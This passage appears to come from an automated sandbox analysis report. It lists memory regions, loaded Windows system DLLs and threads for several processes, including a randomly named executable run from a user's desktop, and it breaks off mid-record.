region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 374 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 375 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 376 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 377 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 378 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 379 start_va = 0xa94f2b0000 end_va = 0xa94f3befff entry_point = 0x0 region_type = private name = "private_0x000000a94f2b0000" filename = "" Region: id = 380 start_va = 0xa94f440000 end_va = 0xa94f54afff entry_point = 0x0 region_type = private name = "private_0x000000a94f440000" filename = "" Region: id = 381 start_va = 0xa94f620000 end_va = 0xa94f62ffff entry_point = 0x0 region_type = private name = "private_0x000000a94f620000" filename = "" Region: id = 382 start_va = 0xa94f630000 end_va = 0xa94f966fff entry_point = 0xa94f630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 383 start_va = 0xa94f970000 end_va = 0xa94fb8afff entry_point = 0x0 region_type = private name = "private_0x000000a94f970000" filename = "" Region: id = 384 start_va = 0xa94fb90000 end_va = 0xa94fda0fff entry_point = 0x0 region_type = private name = "private_0x000000a94fb90000" filename = "" Region: id = 385 start_va = 0xa94fdb0000 end_va = 0xa94ffc1fff entry_point = 0x0 region_type = private name = "private_0x000000a94fdb0000" filename = "" Region: id = 386 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 387 start_va = 0xa94db30000 end_va = 0xa94db33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94db30000" filename = "" Region: id = 388 start_va = 0xa94f3c0000 end_va = 0xa94f3c6fff entry_point = 0x0 region_type = private name = "private_0x000000a94f3c0000" filename = "" Region: id = 389 start_va = 0xa94f3d0000 end_va = 0xa94f3d4fff entry_point = 0xa94f3d0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 390 start_va = 0xa94f3e0000 end_va = 0xa94f3e0fff entry_point = 0xa94f3e0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 391 start_va = 0xa94f3f0000 end_va = 0xa94f3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94f3f0000" filename = "" Region: id = 392 start_va = 0xa94f550000 end_va = 0xa94f607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94f550000" filename = "" Region: id = 393 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 394 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 395 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 396 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Thread: id = 10 os_tid = 0x510 Thread: id = 11 os_tid = 0x458 Thread: id = 12 os_tid = 0xa44 Thread: id = 13 os_tid = 0x67c Process: id = "5" image_name = "nwypdmno.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe" page_root = "0x2cbbb000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 427 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 428 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 429 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 430 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 431 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 432 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 433 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 434 start_va = 0x400000 end_va = 0x53efff entry_point = 0x400000 region_type = mapped_file name = "nwypdmno.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe") Region: id = 435 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 436 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 437 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 438 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 439 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 440 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 441 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 442 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 443 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 446 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 447 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 448 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 449 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 450 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 513 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 514 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 515 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 516 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 517 start_va = 0x310000 end_va = 0x3cdfff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 518 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 519 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 520 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 521 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 522 start_va = 0x810000 end_va = 0x990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 523 start_va = 0x9a0000 end_va = 0x1d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 524 start_va = 0x74860000 end_va = 0x7487bfff entry_point = 0x74860000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 525 start_va = 0x74880000 end_va = 0x7489afff entry_point = 0x74880000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 526 start_va = 0x748a0000 end_va = 0x748a9fff entry_point = 0x748a0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 527 start_va = 0x748b0000 end_va = 0x748bffff entry_point = 0x748b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 528 start_va = 0x748c0000 end_va = 0x748d2fff entry_point = 0x748c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 529 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 530 start_va = 0x74990000 end_va = 0x74a20fff entry_point = 0x74990000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 531 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 532 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 533 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 534 start_va = 0x74ac0000 end_va = 0x74ac6fff entry_point = 0x74ac0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 535 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 536 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 537 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 538 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 539 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 540 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 541 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 542 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 543 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 544 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 545 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 546 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 547 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 548 start_va = 0x76ed0000 end_va = 0x76f2bfff entry_point = 0x76ed0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 549 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 550 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 551 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 552 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 553 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 554 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 555 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 556 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 557 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 558 start_va = 0x1da0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 559 start_va = 0x1ee0000 end_va = 0x2216fff entry_point = 0x1ee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 560 start_va = 0x74720000 end_va = 0x74731fff entry_point = 0x74720000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 561 start_va = 0x74660000 end_va = 0x74675fff entry_point = 0x74660000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 562 start_va = 0x74640000 end_va = 0x74652fff entry_point = 0x74640000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 563 start_va = 0x74810000 end_va = 0x7485dfff entry_point = 0x74810000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 564 start_va = 0x74780000 end_va = 0x74803fff entry_point = 0x74780000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 565 start_va = 0x74710000 end_va = 0x7471afff entry_point = 0x74710000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 566 start_va = 0x74750000 end_va = 0x7477ffff entry_point = 0x74750000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 567 start_va = 0x74740000 end_va = 0x74747fff entry_point = 0x74740000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 568 start_va = 0x746c0000 end_va = 0x74705fff entry_point = 0x746c0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 569 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 570 start_va = 0x746b0000 end_va = 0x746b7fff entry_point = 0x746b0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 571 start_va = 0x2220000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 572 start_va = 0x2260000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 573 start_va = 0x2360000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 574 start_va = 0x23a0000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 575 start_va = 0x24a0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 576 start_va = 0x24e0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 577 start_va = 0x25e0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 578 start_va = 0x2620000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 579 start_va = 0x2720000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 580 start_va = 0x2760000 end_va = 0x285ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 581 start_va = 0x2860000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 582 start_va = 0x28a0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 583 start_va = 0x29a0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 584 start_va = 0x29e0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 585 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 586 start_va = 0x7fea1000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea1000" filename = "" Region: id = 587 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 588 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 589 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 590 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 591 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 592 start_va = 0x2ae0000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 593 start_va = 0x2b20000 end_va = 0x2c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 594 start_va = 0x2c20000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 595 start_va = 0x2c60000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 596 start_va = 0x2d60000 end_va = 0x2d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 597 start_va = 0x2da0000 end_va = 0x2e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 598 start_va = 0x7fe95000 end_va = 0x7fe97fff entry_point = 0x0 region_type = private name = "private_0x000000007fe95000" filename = "" Region: id = 599 start_va = 0x7fe98000 end_va = 0x7fe9afff entry_point = 0x0 region_type = private name = "private_0x000000007fe98000" filename = "" Region: id = 600 start_va = 0x7fe9b000 end_va = 0x7fe9dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe9b000" filename = "" Region: id = 601 start_va = 0x2ea0000 end_va = 0x2edffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 602 start_va = 0x2ee0000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 603 start_va = 0x2fe0000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 604 start_va = 0x3020000 end_va = 0x311ffff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 605 start_va = 0x3120000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 606 start_va = 0x3160000 end_va = 0x325ffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 607 start_va = 0x3260000 end_va = 0x329ffff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 608 start_va = 0x32a0000 end_va = 0x339ffff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 609 start_va = 0x33a0000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 610 start_va = 0x33e0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 611 start_va = 0x7fe86000 end_va = 0x7fe88fff entry_point = 0x0 region_type = private name = "private_0x000000007fe86000" filename = "" Region: id = 612 start_va = 0x7fe89000 end_va = 0x7fe8bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe89000" filename = "" Region: id = 613 start_va = 0x7fe8c000 end_va = 0x7fe8efff entry_point = 0x0 region_type = private name = "private_0x000000007fe8c000" filename = "" Region: id = 614 start_va = 0x7fe8f000 end_va = 0x7fe91fff entry_point = 0x0 region_type = private name = "private_0x000000007fe8f000" filename = "" Region: id = 615 start_va = 0x7fe92000 end_va = 0x7fe94fff entry_point = 0x0 region_type = private name = "private_0x000000007fe92000" filename = "" Region: id = 616 start_va = 0x34e0000 end_va = 0x351ffff entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 617 start_va = 0x3520000 end_va = 0x361ffff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 618 start_va = 0x3620000 end_va = 0x365ffff entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 619 start_va = 0x3660000 end_va = 0x375ffff entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 620 start_va = 0x3760000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 621 start_va = 0x37a0000 end_va = 0x389ffff entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 622 start_va = 0x38a0000 end_va = 0x38dffff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 623 start_va = 0x38e0000 end_va = 0x39dffff entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 624 start_va = 0x7fe7a000 end_va = 0x7fe7cfff entry_point = 0x0 region_type = private name = "private_0x000000007fe7a000" filename = "" Region: id = 625 start_va 